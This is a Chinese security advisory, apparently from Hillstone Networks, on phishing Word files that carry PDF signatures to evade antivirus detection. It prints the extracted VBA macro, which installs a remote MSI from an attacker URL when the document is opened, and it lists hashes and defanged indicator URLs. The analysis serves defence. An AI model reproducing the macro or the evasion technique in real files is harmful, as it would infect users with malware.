警惕携带PDF特征的Word文件钓鱼攻击

admin 2023年9月12日20:03:21评论84 views字数 1766阅读5分53秒阅读模式
攻击描述

近期,山石网科情报中心发现了一批恶意DOC文件,这些文件采用了巧妙的伪装技术,能够有针对性地绕过杀毒软件的文件检测。恶意攻击者利用MIME格式嵌入了PDF文件(ActiveMime)到Word文档中,以传播携带恶意代码的文档文件。这些文档具有PDF文件的格式特征,导致杀毒软件、EPP(终端点防护)和EDR(终端威胁检测与响应)等安全产品使用PDF逻辑进行处理。但与此同时,被攻击的用户可以使用OFFICE工具打开这些文档,从而具有非常强的免疫杀毒软件的效果。

简要分析
文档后缀是.doc,为早期office文件格式,打开是诱饵文件诱导用户启动宏:

警惕携带PDF特征的Word文件钓鱼攻击

当用户启用宏就会触发恶意下载行为。文件包含PDF魔术字和结构:

警惕携带PDF特征的Word文件钓鱼攻击

钓鱼文件mime各个流加了混淆,不是特别方便查看,通过emldump.py解密如下:

警惕携带PDF特征的Word文件钓鱼攻击

通过 -E %HEADASCII% 检查每一个部分,找出实际ActiveMime所在位置:

警惕携带PDF特征的Word文件钓鱼攻击

找到第14个区块位置,导入到oledump查看宏内容,python emldump.py mal.doc -d -F -s 14 | oledump.py -s 3 -v:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Label11, 1, 0, MSForms, Label"
Attribute VB_Control = "Label1, 0, 1, MSForms, Label"
Private Sub Document_Open()
On Error Resume Next
Dim office As Object
Set office = CreateObject("WindowsInstaller.Installer")
office.UILevel = 2
abc = "https://web365metrics[.]com/files/69fbd341bcf4f734fd47f72710021ae6839/plugin[.]msi"
office.InstallProduct abc
End Sub
这段恶意宏代码功能是在文档打开时,通过Windows Installer安装一个指定URL的MSI文件。目前URL已经关闭无法访问。
山石情报中心对该类攻击相关样本已经收录,用户可以在山石网科威胁情报中心云瞻中查看相关IOC信息:

警惕携带PDF特征的Word文件钓鱼攻击

处置建议

用户可以通过使用山石网科的防火墙和NIPS产品,利用其C2和AV防护模块来提高网络安全,从而降低潜在风险。为确保最佳保护,用户应及时升级特征库,确保其包含截至2023年9月4日的最新安全特征信息。山石网科的防火墙不仅提供了先进的网络安全防护功能,还集成了态势感知云景的智能能力,可以高效地监测和拦截与APT组织相关的威胁情报(IOC)和恶意行为。此外,它还能够快速响应和拦截与当前安全趋势、安全事件和相关样本有关的威胁。

失陷指标
718148a5712c1fec7b50acc89eee2aa0

cba6bd373e42a7bcbc4c7251bc188b69

d537f8b812a3902b90aa16281aa1314b

hxxxs://web365metrics[.]com/files/69fbd341bcf4f734fd47f72710021ae6839/MicrosoftOffiice[.]Hub[.]msi

hxxxs://web365metrics[.]com/files/69fbd341bcf4f734fd47f72710021ae6839/plugin[.]msi

hxxxs://cloudmetricsapp[.]com/wp-content/uploads/docs/addin[.]msi

原文始发于微信公众号(山石网科安全技术研究院):警惕携带PDF特征的Word文件钓鱼攻击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月12日20:03:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   警惕携带PDF特征的Word文件钓鱼攻击http://cn-sec.com/archives/2030971.html

发表评论

匿名网友 填写信息